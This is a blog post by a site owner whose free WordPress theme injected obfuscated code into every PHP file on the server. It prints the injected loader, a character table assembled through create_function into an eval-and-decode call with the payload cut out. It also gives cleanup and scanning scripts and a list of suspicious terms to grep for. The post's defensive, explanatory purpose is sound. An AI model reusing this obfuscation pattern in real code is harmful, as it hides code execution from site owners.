Free WordPress themes and Malicious/Devil Codes


I know it doesn’t sound good to talk bad here, especially when you are writing an article after a long while. We have changed our website theme so it looks simple and loads pretty fast, and we are back in our business of giving things away free and expecting nothing back :-) . We don’t ask you to sign up, we don’t ask you to click or read through our ads, and we don’t ask you to pay for our service. There are many amazing things out there which are absolutely free, like the WordPress platform we are using, which is incredible! One would normally not think twice before using any freely available WordPress theme. I made the same mistake: I went ahead and installed a theme named ‘Freshblog’, created by ‘Best WordPress Themes’ and featured at WordPress Theme Shock and Themes2WP, for this site, only to realize that I had been hacked! I first noticed a few links pointing to some crazy websites being inserted at the bottom of every page, and I could not find where they were coming from. It was not any of the plug-ins doing this. I used the WP re-install feature to rewrite all the WP files except wp-content and wp-config.php. The problem didn’t go away. I did a backtrace at different levels and found a chunk of malicious code in wp-config.php. I then searched for the same pattern across my entire server and whoa! Every PHP file on my server had been injected with this malicious code.

I would not have had any issues if they had added a few links back to their site in return for providing this theme for free, but the buggers injected the malicious code into every PHP file on my server, driving me nuts. Thank God it was all in the same pattern, which made it easy for me to clean it up with a script.

Now, how to scan for this malicious script and clean it?

Here is the script I wrote to clean the malicious code from all the PHP files on the server. Copy the code below into a file, put it in the root folder on your server and run it; it rewrites files in place, so take a backup first and delete the script when you are done. I am sure most of the free themes from the sites mentioned above carry the malicious code in the same format. I’ll try to add more patterns to this script as you or I come across others.

<?php
// Walk every file below the current directory (drop this file in the web root and run it).
$di = new RecursiveDirectoryIterator(getcwd(), RecursiveDirectoryIterator::SKIP_DOTS);
foreach (new RecursiveIteratorIterator($di) as $filename => $file) {
	$path = pathinfo($filename);
	if (isset($path['extension']) && 'php' == strtolower($path['extension'])) {
		$content = file_get_contents($filename);
		// Strip the injected block: from its "<?php" through "$md5" up to the next "<",
		// which is the opening tag of the file's real code.
		$replaced = preg_replace('/\<\?php[.\r\n\t\s]*\$md5[.\r\n\t\s]*([^<]+)*/', '', $content);
		if ($content != $replaced) {
			file_put_contents($filename, $replaced);
			echo 'Cleaned ' . $filename . '<br/>';
		}
	}
}

The malicious code in the theme I installed looked like this:

$md5 = "f87975b5d07349ceb2073f410800d343";
$wp_salt = array(';',"n",'t',")","v",'_','e','o',"l",'r',"g",'i','s',"6","a",'b','4',"$",'c','z','d',"f","(");
$wp_add_filter = create_function('$'.'v',$wp_salt[6].$wp_salt[4].$wp_salt[14].$wp_salt[8].$wp_salt[22].$wp_salt[10].$wp_salt[19].$wp_salt[11].$wp_salt[1].$wp_salt[21].$wp_salt[8].$wp_salt[14].$wp_salt[2].$wp_salt[6].$wp_salt[22].$wp_salt[15].$wp_salt[14].$wp_salt[12].$wp_salt[6].$wp_salt[13].$wp_salt[16].$wp_salt[5].$wp_salt[20].$wp_salt[6].$wp_salt[18].$wp_salt[7].$wp_salt[20].$wp_salt[6].$wp_salt[22].$wp_salt[17].$wp_salt[4].$wp_salt[3].$wp_salt[3].$wp_salt[3].$wp_salt[0]);
$wp_add_filter('FZfFzobalkUf........Huge Junk Code Here......obalkU');

There is an excellent post telling you why you should use themes only from WordPress.org. Read here: http://wpmu.org/why-you-should-never-search-for-free-wordpress-themes-in-google-or-anywhere-else/

Before installing any free theme you got from a gallery site, search the theme source for terms like ‘md5’, ‘eval’, ‘create_function’, ‘wp_add_filter’ and ‘hex’, and make sure that any hits are not malicious code.
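As an added example (not the post's own script), here is a small Python checker that goes one step past the grep above: it rebuilds the string that the $wp_salt[i] concatenations spell out, so the eval/gzinflate/base64_decode chain hidden in the block quoted earlier becomes visible even though none of those words appear literally in the file. The SAMPLE is constructed from that quoted block with the junk string shortened; the function names and the DANGEROUS list are my own choices.

```python
import re

# Constructed sample modelled on the obfuscated block quoted in the post
# (the giant junk string is shortened; the char table and lookups are the quoted ones).
SAMPLE = r"""<?php
$md5 = "f87975b5d07349ceb2073f410800d343";
$wp_salt = array(';',"n",'t',")","v",'_','e','o',"l",'r',"g",'i','s',"6","a",'b','4',"$",'c','z','d',"f","(");
$wp_add_filter = create_function('$'.'v',$wp_salt[6].$wp_salt[4].$wp_salt[14].$wp_salt[8].
$wp_salt[22].$wp_salt[10].$wp_salt[19].$wp_salt[11].$wp_salt[1].$wp_salt[21].$wp_salt[8].
$wp_salt[14].$wp_salt[2].$wp_salt[6].$wp_salt[22].$wp_salt[15].$wp_salt[14].$wp_salt[12].
$wp_salt[6].$wp_salt[13].$wp_salt[16].$wp_salt[5].$wp_salt[20].$wp_salt[6].$wp_salt[18].
$wp_salt[7].$wp_salt[20].$wp_salt[6].$wp_salt[22].$wp_salt[17].$wp_salt[4].$wp_salt[3].
$wp_salt[3].$wp_salt[3].$wp_salt[0]);
$wp_add_filter('FZfFzobalkUf...JUNK...obalkU');
?>
<?php
/* legitimate theme code would follow here */
"""

# Names that only show up after the char table is decoded; a plain grep misses them.
DANGEROUS = ('eval', 'base64_decode', 'gzinflate', 'gzuncompress', 'str_rot13')

def decode_char_table(src):
    """Rebuild every string assembled by concatenating single-character lookups
    into a PHP array literal (the $wp_salt[i].$wp_salt[j]... trick)."""
    m = re.search(r'\$(\w+)\s*=\s*array\((.*?)\);', src, re.S)
    if not m:
        return []
    name, body = m.group(1), m.group(2)
    table = [a or b for a, b in re.findall(r'\'([^\']*)\'|"([^"]*)"', body)]
    lookup = r'\$%s\[\d+\]' % re.escape(name)
    run_re = re.compile(r'(?:%s\s*\.\s*)+%s' % (lookup, lookup))
    decoded = []
    for run in run_re.finditer(src):
        idx = [int(i) for i in re.findall(r'\[(\d+)\]', run.group(0))]
        decoded.append(''.join(table[i] for i in idx if i < len(table)))
    return decoded

def scan_source(src):
    """Return human-readable findings for one PHP source string (empty list = nothing found)."""
    findings = []
    if re.search(r'\bcreate_function\s*\(', src):
        findings.append('create_function() builds code at runtime')
    if re.search(r'\$md5\s*=\s*["\'][0-9a-f]{32}["\']', src):
        findings.append('$md5 marker seen in the injected block')
    for s in decode_char_table(src):
        hits = [k for k in DANGEROUS if k in s]
        if hits:
            findings.append('char-table string decodes to %r (%s)' % (s, ', '.join(hits)))
    return findings

if __name__ == '__main__':
    for line in scan_source(SAMPLE):
        print(line)
```

Feed it the contents of each .php file from a directory walk like the PHP script above to triage a theme before activating it.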

You can also install and run the plug-in ‘Exploit Scanner’ to see if you have already been hacked. If you see a different pattern of malicious code, send me the code and I will add matching patterns for it to my scanner script.

Have Fun!
